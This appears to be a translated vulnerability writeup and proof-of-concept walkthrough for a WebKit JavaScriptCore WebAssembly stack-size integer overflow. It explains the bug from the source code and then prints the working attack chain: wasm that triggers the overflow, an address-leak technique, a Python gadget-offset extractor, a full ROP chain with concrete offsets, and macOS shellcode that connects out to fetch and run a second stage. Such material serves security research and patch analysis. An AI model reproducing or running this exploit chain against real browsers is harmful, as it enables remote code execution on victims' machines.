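Overview
About the POC
gen_wasm.py: generates the WebAssembly module and writes it to rets.wasm
shellcode: the first-stage shellcode, run once the overflow has been exploited. By default it connects to localhost:1337, then fetches and loads the second-stage (sandbox escape) shellcode to achieve arbitrary code execution. (The second-stage shellcode has not been released.)
stage2_server.py: listens on local port 1337 and serves the second-stage shellcode
pwn.html: entry point of the browser exploit; loads pwn.js
pwn.js: spawns two worker threads, fetches the wasm data and hands it to the workers
worker.js: worker thread that loads the wasm to trigger the vulnerability
worker2.js: worker thread that acts as the victim thread and hosts the ROP chain and the shellcode
rets.wasm: the wasm binary generated by the gen_wasm.py script, i.e. the WebAssembly program that is actually parsed when the vulnerability is triggered
rets.wat: rets.wasm, after some modification, decompiled to wat text with wabt; it helps in understanding the structure of the wasm program the POC generates
jsc_offsets: basic information needed before the wasm is generated, such as the offset from the leaked address to the dylib base, the offsets of the gadgets used in the ROP chain, and the addresses of key calls
stage2_shellcode.bin: the second-stage shellcode. Since no usable sandbox escape is available, stage2_shellcode here contains only an int3 breakpoint and some filler data
Files marked with * were not provided by the POC author; they must be generated with the scripts or supplied as needed.
rce % python3 gen_wasm.py -offs prod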
leak_off, hndl_raw_mem_off, gadg, syms = 15337245, 40, {'ret': 15347, 'rdi': 4627172, 'rsi': 624110, 'rdx': 3993325, 'rcx': 917851, 'jmp_rax': 76691}, {'__ZN3JSC19ExecutableAllocator8allocateEmNS_20JITCompilationEffortE': 10101216, '_memcpy': 16987498, '_dlsym': 16987090}
module of len 0x10009316 written
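Vulnerability analysis
In one sentence
When WebKit's JavaScriptCore loads and parses a WebAssembly module, the stack-size counter m_maxStackSize can overflow. This leads to an incorrect stack frame allocation in the WebAssembly function prologue (wasmPrologue) and ultimately to code execution inside the sandbox.
Wasm module -> parse phase -> function prologue phase -> run function body
Wasm module -> parse phase (m_maxStackSize = 0xffffffff) -> function prologue phase (m_numCalleeLocals = 0; no stack space allocated) -> run function body, pushes overwrite memory -> address leak -> ROP chain -> shellcode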
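JavaScriptCore background
LLInt -> BBQ -> OMG
The JavaScriptCore/llint/LowLevelInterpreter.asm file
slow_path: these functions can be seen in the asm file (we will come back to this in the address leak section)
Vulnerability-related code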
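Parser (WasmFunctionParser)
The parser is responsible for validating functions. This covers type checking of all stack operations and of control-flow branches (using m_controlStack and m_expressionStack).
// JavaScriptCore/wasm/WasmFunctionParser.h
Stack m_expressionStack;
ControlStack m_controlStack;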
// JavaScriptCore/wasm/WasmFunctionParser.h
enum class BlockType {
If,
Block,
Loop,
TopLevel
};
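The expression stack is kept separate from that of the enclosing block (enclosedExpressionStack).
Generator (WasmLLIntGenerator)
The generator tracks various metadata, including the current overall stack size (m_stackSize) and the maximum stack size reached during the whole parse (m_maxStackSize). The current stack size helps translate abstract stack positions into local stack offsets, while the maximum determines how much stack space is allocated in the function prologue.
// JavaScriptCore/wasm/WasmLLIntGenerator.cpp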
unsigned m_stackSize { 0 };
unsigned m_maxStackSize { 0 };
m_stackSize: the current length of the expression stack (m_expressionStack). Under the argument-passing convention on x86_64, 2 non-volatile (callee-saved) registers, 6 general purpose registers and 8 floating point registers are reserved for function calls by default, so m_stackSize starts at 16 regardless of how many arguments the function actually takes.
JSC::Wasm::numberOfLLIntCalleeSaveRegisters: the 2 callee-saved registers reserved by the calling convention
// JavaScriptCore/wasm/WasmCallingConvention.h
constexpr unsigned numberOfLLIntCalleeSaveRegisters = 2;
JSC::GPRInfo::numberOfArgumentRegisters: number of general purpose argument registers, 6 by default on x86_64
// JavaScriptCore/jit/GPRInfo.h
#if CPU(X86_64)
#if !OS(WINDOWS)
#define NUMBER_OF_ARGUMENT_REGISTERS 6u
......
class GPRInfo {
public:
typedef GPRReg RegisterType;
static constexpr unsigned numberOfRegisters = 11;
static constexpr unsigned numberOfArgumentRegisters = NUMBER_OF_ARGUMENT_REGISTERS;
......
JSC::FPRInfo::numberOfArgumentRegisters: number of floating point argument registers, 8 by default on x86_64
// JavaScriptCore/jit/FPRInfo.h
class FPRInfo {
public:
typedef FPRReg RegisterType;
static constexpr unsigned numberOfRegisters = 6;
static constexpr unsigned numberOfArgumentRegisters = is64Bit() ? 8 : 0;
......
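The starting value of m_stackSize follows directly from the three constants quoted above. A minimal sketch of that sum; the Python names are chosen here for illustration and only mirror the C++ constants, they are not part of the POC.

```python
# Values quoted from the JavaScriptCore headers above (x86_64, non-Windows).
# The Python names are illustrative stand-ins for the C++ constants.
NUMBER_OF_LLINT_CALLEE_SAVE_REGISTERS = 2  # Wasm::numberOfLLIntCalleeSaveRegisters
GPR_ARGUMENT_REGISTERS = 6                 # GPRInfo::numberOfArgumentRegisters
FPR_ARGUMENT_REGISTERS = 8                 # FPRInfo::numberOfArgumentRegisters


def initial_stack_size() -> int:
    """Slots reserved before any wasm value is pushed."""
    return (NUMBER_OF_LLINT_CALLEE_SAVE_REGISTERS
            + GPR_ARGUMENT_REGISTERS
            + FPR_ARGUMENT_REGISTERS)


print(initial_stack_size())  # 16
```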
m_maxStackSize: during wasm parsing, tracks the maximum stack length the function needs; it is normally updated on push
// JavaScriptCore/wasm/WasmLLIntGenerator.cpp
enum NoConsistencyCheckTag { NoConsistencyCheck };
ExpressionType push(NoConsistencyCheckTag)
{
m_maxStackSize = std::max(m_maxStackSize, ++m_stackSize);
return virtualRegisterForLocal(m_stackSize - 1);
}
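To make the bookkeeping in push() concrete, here is a toy model of the two counters as 32-bit unsigned values. It is only a sketch: the class name, the pop() helper and the initial values are assumptions made for illustration, not the real generator.

```python
MASK32 = 0xFFFFFFFF  # `unsigned` is 32 bits wide here


class StackCounters:
    """Toy model of m_stackSize / m_maxStackSize (hypothetical helper)."""

    def __init__(self, stack_size: int = 0, max_stack_size: int = 0):
        self.stack_size = stack_size & MASK32
        self.max_stack_size = max_stack_size & MASK32

    def push(self) -> int:
        # m_maxStackSize = std::max(m_maxStackSize, ++m_stackSize);
        self.stack_size = (self.stack_size + 1) & MASK32
        self.max_stack_size = max(self.max_stack_size, self.stack_size)
        return self.stack_size - 1  # index passed to virtualRegisterForLocal

    def pop(self) -> None:
        self.stack_size = (self.stack_size - 1) & MASK32


c = StackCounters()
for _ in range(3):
    c.push()
c.pop()
c.pop()
c.push()
print(c.stack_size, c.max_stack_size)  # 2 3
```

The high-water mark only ever grows, so nothing stops it from reaching 0xffffffff if enough values are pushed during parsing.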
// JavaScriptCore/wasm/WasmLLIntGenerator.cpp
std::unique_ptr<FunctionCodeBlock> LLIntGenerator::finalize()
{
RELEASE_ASSERT(m_codeBlock);
m_codeBlock->m_numCalleeLocals = WTF::roundUpToMultipleOf(stackAlignmentRegisters(), m_maxStackSize);
auto& threadSpecific = threadSpecificBuffer();
Buffer usedBuffer;
m_codeBlock->setInstructions(m_writer.finalize(usedBuffer));
size_t oldCapacity = usedBuffer.capacity();
usedBuffer.resize(0);
RELEASE_ASSERT(usedBuffer.capacity() == oldCapacity);
*threadSpecific = WTFMove(usedBuffer);
return WTFMove(m_codeBlock);
}
m_numCalleeLocals: once parsing completes, this value is m_maxStackSize rounded up to align the stack (16-byte alignment, i.e. 2 register widths on x86_64). However, m_numCalleeLocals is declared as int.
// WTF/wtf/StdLibExtras.h
ALWAYS_INLINE constexpr size_t roundUpToMultipleOfImpl(size_t divisor, size_t x)
{
size_t remainderMask = divisor - 1;
return (x + remainderMask) & ~remainderMask; // divisor = 2; x = 0xffffffff; return 0x100000000;
}
// Efficient implementation that takes advantage of powers of two.
inline size_t roundUpToMultipleOf(size_t divisor, size_t x)
{
ASSERT(divisor && !(divisor & (divisor - 1)));
return roundUpToMultipleOfImpl(divisor, x);
}
// JavaScriptCore/wasm/WasmFunctionCodeBlock.h
class FunctionCodeBlock{
......
private:
using OutOfLineJumpTargets = HashMap<InstructionStream::Offset, int>;
uint32_t m_functionIndex;
int m_numVars { 0 };
int m_numCalleeLocals { 0 }; // 0x100000000 ==> m_numCalleeLocals = 0x00000000;
uint32_t m_numArguments { 0 };
Vector<Type> m_constantTypes;
......
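The rounding and the narrowing to int can be replayed with plain integer arithmetic. The sketch below assumes a 64-bit size_t and a 32-bit int, and models the narrowing as keeping the low 32 bits (the behaviour seen in practice on this platform); the function names are illustrative.

```python
def round_up_to_multiple_of(divisor: int, x: int) -> int:
    """Mirror of WTF::roundUpToMultipleOf for a power-of-two divisor (64-bit size_t)."""
    assert divisor and not (divisor & (divisor - 1))
    mask = divisor - 1
    return ((x + mask) & ~mask) & 0xFFFFFFFFFFFFFFFF


def store_as_int32(value: int) -> int:
    """Keep the low 32 bits and reinterpret them as a signed int."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


rounded = round_up_to_multiple_of(2, 0xFFFFFFFF)
print(hex(rounded), store_as_int32(rounded))  # 0x100000000 0
```

The 64-bit result is correct; it is only the assignment into the 32-bit member that drops the single set bit.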
macro wasmPrologue(codeBlockGetter, codeBlockSetter, loadWasmInstance)
......
# Get new sp in ws1 and check stack height.
loadi Wasm::FunctionCodeBlock::m_numCalleeLocals[ws0], ws1 # <---- m_numCalleeLocals
lshiftp 3, ws1
addp maxFrameExtentForSlowPathCall, ws1
subp cfr, ws1, ws1
bpa ws1, cfr, .stackOverflow
bpbeq Wasm::Instance::m_cachedStackLimit[wasmInstance], ws1, .stackHeightOK
.stackOverflow:
throwException(StackOverflow)
.stackHeightOK:
move ws1, sp
......
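The stack pointer computation in the prologue can be sketched the same way. This is a simplified model under stated assumptions: the frame pointer value is hypothetical, and maxFrameExtentForSlowPathCall is passed as a parameter defaulting to 0, which is an assumption rather than something taken from the listing.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF


def new_stack_pointer(cfr: int, num_callee_locals: int,
                      max_frame_extent: int = 0) -> int:
    """sp chosen by the prologue: cfr - (numCalleeLocals * 8 + extent)."""
    frame_bytes = (num_callee_locals << 3) + max_frame_extent  # lshiftp 3 / addp
    return (cfr - frame_bytes) & MASK64                        # subp cfr, ws1, ws1


cfr = 0x70000B2D7F00  # hypothetical frame pointer
print(hex(new_stack_pointer(cfr, 18)))  # 0x70000b2d7e70, room for 18 slots
print(hex(new_stack_pointer(cfr, 0)))   # 0x70000b2d7f00, no room at all
```

With m_numCalleeLocals equal to 0 the overflow check passes trivially and sp is left at the frame pointer, so every later push lands outside the frame the function believes it owns.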
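Exploitation
Triggering the vulnerability
The target is a wasm function that performs 2^32 push operations. The POC ultimately combines the multi-value paradigm mentioned earlier with the parser's handling of unreachable code.
unreachable: for code that is explicitly declared unreachable, or that follows an unconditional branch and can never execute (dead code), the generator pushes the declared return types directly onto the enclosed stack
auto LLIntGenerator::addEndToUnreachable(ControlEntry& entry, const Stack& expressionStack, bool unreachable) -> PartialResult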
{
......
for (unsigned i = 0; i < data.m_signature->returnCount(); ++i) {
......
if (unreachable)
entry.enclosedExpressionStack.constructAndAppend(data.m_signature->returnType(i), tmp); // push returnType -> enclosedExpressionStack
else
entry.enclosedExpressionStack.append(expressionStack[i]);
}
......
return { };
}
// WTF/wtf/Vector.h
bool allocateBuffer(size_t newCapacity)
{
static_assert(action == FailureAction::Crash || action == FailureAction::Report);
ASSERT(newCapacity);
if (newCapacity > std::numeric_limits<unsigned>::max() / sizeof(T)) { // check
if constexpr (action == FailureAction::Crash)
CRASH();
......
size_t sizeToAllocate = newCapacity * sizeof(T);
......
m_capacity = sizeToAllocate / sizeof(T); // max 2^32
m_buffer = newBuffer;
return true;
}
(module
(type (;0;) (func))
(type (;1;) (func (result f64 f64 ... ))) ;; a lot of f64 (f64 * 0x10000000)
(type (;2;) (func (param i64 i64)))
(import "e" "mem" (memory (;0;) 1))
(func (;0;) (type 2) (param i64 i64)
;; "real" code we want to execute can be placed here
i32.const 1 ;; use 'br_if', or the following code would be 'dead_code'
br_if 0 (;@0;) ;;
block ;; label = @1 ;; begin to fill 32GB
block (result f64 f64 ... ) ;; label = @2 ;; push m_maxStackSize to 0xffffffff
unreachable ;; then m_numCalleeLocals = 0x0
end ;; when parsing completes.
;; current stack has 0x10000000 values, m_maxStackSize = 0x10000000
block ;; label = @2
;; new block has an empty expression stack
block (result f64 f64 ... ) ;; label = @3
unreachable
end
;; current stack has 0x10000000 values, m_maxStackSize = 0x20000000
block ;; label = @3
block (result f64 f64 ... ) ;; label = @4
unreachable
end
......
br 0 (;@3;)
end
br 0 (;@2;)
end
br 0 (;@1;)
end
return)
(func (;1;) (type 0)
i64.const 0
i64.const 0
call 0)
(export "rets" (func 1)))
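The numbers in the listing's comments can be checked with a little arithmetic. This is only a back-of-the-envelope sketch: it uses the per-block count and the target value named in the text, assumes 8-byte stack slots (consistent with the `lshiftp 3` in the prologue), and does not reproduce how the POC composes the exact final count.

```python
VALUES_PER_BLOCK = 0x10000000  # f64 results per block type, from the listing
TARGET = 0xFFFFFFFF            # m_maxStackSize value named in the text
SLOT_BYTES = 8                 # assumed size of one stack slot


def blocks_needed(target: int = TARGET, per_block: int = VALUES_PER_BLOCK):
    """Full blocks and leftover values needed to reach `target`."""
    return divmod(target, per_block)


def stack_span_gib(values: int = TARGET) -> float:
    """Address range covered by `values` slots, in GiB."""
    return values * SLOT_BYTES / 2**30


full, rest = blocks_needed()
print(full, hex(rest))             # 15 0xfffffff
print(round(stack_span_gib(), 2))  # 32.0
```

That span of roughly 32 GiB is what the "begin to fill 32GB" comment in the listing refers to.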
Address leak
| ... |
| loc1 |
| loc0 |
| callee-saved 1 |
| callee-saved 0 |
rsp, rbp -> | previous rbp |
| return address |
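i64 parameters
(type (;2;) (func (param i64 i64)))
(func (;0;) (type 2) (param i64 i64)
slow_path_wasm_out_of_line_jump_target: a slow_path function used for branches in the wasm module whose offset is too large to encode directly in the bytecode format; here an offset of at least 0x80 is enough
block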
;; branch out of block
;; an unconditional `br 0` will not work as the filler would be dead code
i32.const 1
br_if 0
i32.const 0 ;; filler code here...
i32.popcnt ;; such that the offset from the above branch
drop ;; to the end of the block is >= 0x80
......
end
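loc0 holds an address at a fixed offset inside the JavaScriptCore dylib. We can compute this offset ahead of time and use it at run time to obtain the base address of the dylib in memory; loc1 holds a current stack address. Together, these two values provide the information leak needed for remote code execution.
STACK GUARD 70000b255000-70000b256000 [ 4K ] ---/rwx stack guard for thread 1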
Stack 70000b256000-70000b2d8000 [ 520K ] rw-/rwx thread 1
STACK GUARD 70000b2d8000-70000b2d9000 [ 4K ] ---/rwx stack guard for thread 2
Stack 70000b2d9000-70000b35b000 [ 520K ] rw-/rwx thread 2
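The layout in this listing explains why the guard page has to be hopped over: each thread stack sits directly next to a 4K guard region. A small sketch that parses the four lines above and derives the sizes; the regular expression and helper name are illustrative, and the 8-byte slot size is an assumption.

```python
import re

VMMAP_SAMPLE = """\
STACK GUARD 70000b255000-70000b256000 [ 4K ] ---/rwx stack guard for thread 1
Stack 70000b256000-70000b2d8000 [ 520K ] rw-/rwx thread 1
STACK GUARD 70000b2d8000-70000b2d9000 [ 4K ] ---/rwx stack guard for thread 2
Stack 70000b2d9000-70000b35b000 [ 520K ] rw-/rwx thread 2
"""


def parse_regions(text):
    """Return (kind, start, end, size) for every stack-related line."""
    regions = []
    for line in text.splitlines():
        m = re.match(r"(STACK GUARD|Stack)\s+([0-9a-f]+)-([0-9a-f]+)", line)
        if m:
            start, end = int(m.group(2), 16), int(m.group(3), 16)
            regions.append((m.group(1), start, end, end - start))
    return regions


for kind, start, end, size in parse_regions(VMMAP_SAMPLE):
    print(f"{kind:11s} {start:#x}-{end:#x} {size // 1024}K")

GUARD_SLOTS = 0x1000 // 8  # 8-byte slots covered by one 4K guard page
print(GUARD_SLOTS)         # 512
```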
i32.const 1
i32.const 2
i32.const 3
i32.add
block ;; label = @1
local.get 0
i64.const 15337245 ;; subtract offset to JavaScriptCore dylib base
i64.sub
local.set 0
local.get 1
i64.const 144312 ;; offset to where the ropchain will be
i64.sub
local.set 1
i64.const 0 ;; push a ton of constants to hop over the guard page
i64.const 0
......
local.get 0
i64.const 15347 ;; ROP begin
i64.add ;; nop
drop
drop
;; write ROP chain to stack
end
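The i64.sub and i64.add steps above are ordinary offset arithmetic. A minimal sketch using the offsets printed by gen_wasm.py in the overview; the leaked pointer value and the function names are hypothetical and chosen only to make the example runnable.

```python
LEAK_OFF = 15337245  # leak_off printed by gen_wasm.py
GADGETS = {"ret": 15347, "rdi": 4627172, "rsi": 624110,
           "rdx": 3993325, "rcx": 917851, "jmp_rax": 76691}


def dylib_base(leaked_pointer: int) -> int:
    """Base address of the dylib, given the pointer found in loc0."""
    return leaked_pointer - LEAK_OFF


def gadget_address(base: int, name: str) -> int:
    """Absolute address of a gadget, given the dylib base."""
    return base + GADGETS[name]


leaked = 0x7FFF40000000 + LEAK_OFF  # hypothetical leaked pointer
base = dylib_base(leaked)
print(hex(base))                         # 0x7fff40000000
print(hex(gadget_address(base, "ret")))  # 0x7fff40003bf3
```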
There is no need for addrof() and fakeobj() primitives to build the exploit up incrementally; a good old-fashioned ROP chain is enough.
(If lldb.recvuntil("\n\n") never returns, check whether the output of your lldb dis command ends without a trailing newline, and adjust the script as needed.)
import os          # imports used by this excerpt
import subprocess

def get_jsc_offsets_from_shared_cache():
    # Build a tiny helper binary that loads JavaScriptCore and then traps.
    open("/tmp/t.c", "w").write('''
#include <dlfcn.h>
int main() {
    dlopen("/System/Library/Frameworks/JavaScriptCore.framework/Versions/A/JavaScriptCore", RTLD_LAZY);
    asm volatile("int3");
    return 0;
}
''')
    os.system("clang /tmp/t.c -o /tmp/t")
    lldb = subprocess.Popen(["lldb","--no-lldbinit","/tmp/t"], bufsize=0, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    lldb.sendline = lambda s: lldb.stdin.write(s.encode('utf-8')+b'\n')
    def m_recvuntil(s):
        # Read one byte at a time until the output ends with the marker.
        s = s.encode('utf-8')
        buf = b""
        while not buf.endswith(s):
            buf += lldb.stdout.read(1)
        return buf
    lldb.recvuntil = m_recvuntil
    try:
        lldb.sendline("settings set target.x86-disassembly-flavor intel")
        lldb.sendline("r")
        lldb.recvuntil("stopped")
        # Load address of the JavaScriptCore image.
        lldb.sendline("ima list -h JavaScriptCore")
        lldb.recvuntil("0] ")
        jsc_base = int(lldb.recvuntil("\n")[:-1], 16)
        lldb.sendline("dis -n slow_path_wasm_out_of_line_jump_target")
        lldb.recvuntil("JavaScriptCore`slow_path_wasm_out_of_line_jump_target:\n")
        disas = lldb.recvuntil("\n\n").decode("utf-8")
        disas = disas.split('\n')
        # The leaked value is the address of the instruction after the first call.
        disas = [disas[i] for i in range(1,len(disas)) if "call " in disas[i-1]][0]
        leak_off = int(disas.split(' <')[0].strip(), 16)-jsc_base
        ......
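The parsing step at the end of this excerpt is easier to follow on a fixed input. The sketch below applies the same "line after the first call" logic to a made-up disassembly; every address in the sample is hypothetical, as are the function names.

```python
# Hypothetical lldb output; the addresses are invented for illustration.
SAMPLE_DISAS = """\
    0x7fff3a8e0730 <+0>:  push   rbp
    0x7fff3a8e0731 <+1>:  mov    rbp, rsp
    0x7fff3a8e0758 <+40>: call   0x7fff3a8d1234
    0x7fff3a8e075d <+45>: mov    rcx, rax
"""


def return_address_after_first_call(disas_text: str) -> int:
    """Address of the instruction that follows the first `call`."""
    lines = disas_text.split("\n")
    following = [lines[i] for i in range(1, len(lines))
                 if "call " in lines[i - 1]]
    return int(following[0].split(" <")[0].strip(), 16)


def leak_offset(disas_text: str, image_base: int) -> int:
    """Offset of that return address from the image base."""
    return return_address_after_first_call(disas_text) - image_base


print(hex(return_address_after_first_call(SAMPLE_DISAS)))  # 0x7fff3a8e075d
```

Working from offsets rather than absolute addresses keeps the generated module independent of where the dylib happens to be loaded.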
ROP chain
local.get 0 ;; JavaScriptCore dylib address
i64.const <offset to gadget>
i64.add ;; the addition will write the gadget to the stack
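rwx memory needs the MAP_JIT (0x800) flag, and that flag is only granted when the mapping is created with mmap.
This rules out simply using mprotect, placing the shellcode on the stack and returning into it.
Instead, the ROP chain calls ExecutableAllocator::allocate to reserve an address in the existing rwx JIT region, uses memcpy to place the shellcode there, and finally returns into it to execute it.
local.get 0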
i64.const 4627172 ;; pop_rdi
i64.add
drop
drop
local.get 1
i64.const 80
i64.add
drop
drop
local.get 0
i64.const 3993325 ;; pop rdx
i64.add
drop
drop
i64.const 144 ;; len(shellcode)
i64.const 0
i64.or
drop
drop
local.get 0
i64.const 917851 ;; pop rcx
i64.add
drop
drop
i64.const 1
i64.const 0
i64.or
drop
drop
local.get 0
i64.const 10101216 ;; syms['__ZN3JSC19ExecutableAllocator8allocateEmNS_20JITCompilationEffortE']
i64.add
drop
drop
local.get 0
i64.const 4627172 ;; pop rdi
i64.add
drop
drop
local.get 1
i64.const 262144 ;; 0x40000
i64.sub
drop
drop
local.get 0
i64.const 624110 ;; pop rsi
i64.add
drop
drop
drop
local.get 0
i64.const 3993325 ;; pop rdx
i64.add
drop
drop
i64.const 48 ;; hndl_raw_mem_off+8
i64.const 0
i64.or
drop
drop
local.get 0
i64.const 16987498 ;; syms['_memcpy']
i64.add
drop
drop
local.get 0
i64.const 4627172 ;; pop rdi
i64.add
drop
drop
local.get 1
i64.const 176 ;; 22*8
i64.add
drop
drop
local.get 0
i64.const 624110 ;; pop rsi
i64.add
drop
drop
local.get 1
i64.const 262104 ;; 0x40000 - hndl_raw_mem_off
i64.sub
drop
drop
local.get 0
i64.const 3993325 ;; pop rdx
i64.add
drop
drop
i64.const 8
i64.const 0
i64.or
drop
drop
local.get 0
i64.const 16987498 ;; syms['_memcpy']
i64.add
drop
drop
local.get 0
i64.const 4627172 ;; pop rdi
i64.add
drop
drop
drop
local.get 0
i64.const 624110 ;; pop rsi
i64.add
drop
drop
local.get 1
i64.const 248 ;; 31*8
i64.add
drop
drop
local.get 0
i64.const 3993325 ;; pop rdx
i64.add
drop
drop
i64.const 144 ;; len(shellcode)
i64.const 0
i64.or
drop
drop
local.get 0
i64.const 16987498 ;; syms['_memcpy']
i64.add
drop
drop
local.get 0
i64.const 4627172 ;; pop rdi, pass dlsym to shellcode
i64.add
drop
drop
local.get 0
i64.const 16987090 ;; syms['_dlsym']
i64.add
drop
drop
local.get 0
i64.const 76691 ;; gadg['jmp_rax']
i64.add
drop ;; begin to write shellcode
i64.const 144115607791438153
i64.or
drop
......
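The large i64 constant above is eight bytes of first-stage shellcode packed as a little-endian integer. A short sketch that unpacks it; the helper name is illustrative.

```python
import struct


def i64_const_to_bytes(value: int) -> bytes:
    """Bytes that an 8-byte little-endian store of `value` leaves in memory."""
    return struct.pack("<Q", value & 0xFFFFFFFFFFFFFFFF)


chunk = i64_const_to_bytes(144115607791438153)
print(chunk.hex())  # 4989ffb861000002
```

The bytes 49 89 ff encode `mov r15, rdi` and b8 61 00 00 02 encode `mov eax, 0x2000061`, which are the first two instructions of the shellcode shown in the next section.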
shellcode
sc = '''
## save dlsym pointer
mov r15, rdi
## socket(AF_INET, SOCK_STREAM, 0)
mov eax, 0x2000061
mov edi, 2
mov esi, 1
xor edx, edx
syscall
mov rbp, rax
## create addr struct
mov eax, dword ptr [rip+ipaddr]
mov r14, rax
shl rax, 32
or rax, 0x%x
push rax
mov eax, 0x2000062
mov rdi, rbp
mov rsi, rsp
mov dl, 0x10
syscall
## read sc size
mov eax, 0x2000003
mov dl, 8
syscall
## mmap rwx
xor edi, edi
pop rsi
mov dl, 7
mov r10d, 0x1802 # MAP_PRIVATE|MAP_ANONYMOUS|MAP_JIT
xor r8, r8
dec r8
xor r9, r9
mov eax, 0x20000c5
syscall
## read sc
mov rdi, rbp
mov rdx, rsi
mov rsi, rax
push rsi
read_hdr:
test rdx, rdx
jz read_done
mov eax, 0x2000003
## rdx gets trashed somehow in syscall???? no clue...
push rdx
syscall
pop rdx
sub rdx, rax
add rsi, rax
jmp read_hdr
read_done:
pop rsi
## jmp to sc, pass dlsym, socket, and server ip
## (need call not jmp to 16-byte align stack)
mov rdi, r15
xchg rsi, rbp
mov rdx, r14
call rbp
ipaddr:
'''%(2|(port<<16))
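The magic numbers in the assembly are easier to read once decoded. The sketch below splits the eax values into the BSD syscall class (0x2000000) and the syscall number, and names the bits in the mmap flags value; the tables cover only the values that appear in this shellcode, and the helper names are illustrative.

```python
SYSCALL_CLASS_UNIX = 0x2000000  # BSD syscall class prefix on macOS x86_64
BSD_SYSCALLS = {3: "read", 97: "socket", 98: "connect", 197: "mmap"}
MAP_FLAGS = {0x0002: "MAP_PRIVATE", 0x0800: "MAP_JIT", 0x1000: "MAP_ANON"}


def decode_syscall(eax: int) -> str:
    """Name of the BSD syscall selected by an eax value from the shellcode."""
    number = eax & 0xFFFFFF
    return BSD_SYSCALLS.get(number, f"unknown({number})")


def decode_mmap_flags(flags: int) -> list:
    """Names of the known flag bits set in `flags`, lowest bit first."""
    return [name for bit, name in sorted(MAP_FLAGS.items()) if flags & bit]


for eax in (0x2000061, 0x2000062, 0x2000003, 0x20000C5):
    print(hex(eax), decode_syscall(eax))
print(decode_mmap_flags(0x1802))  # ['MAP_PRIVATE', 'MAP_JIT', 'MAP_ANON']
```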
Summary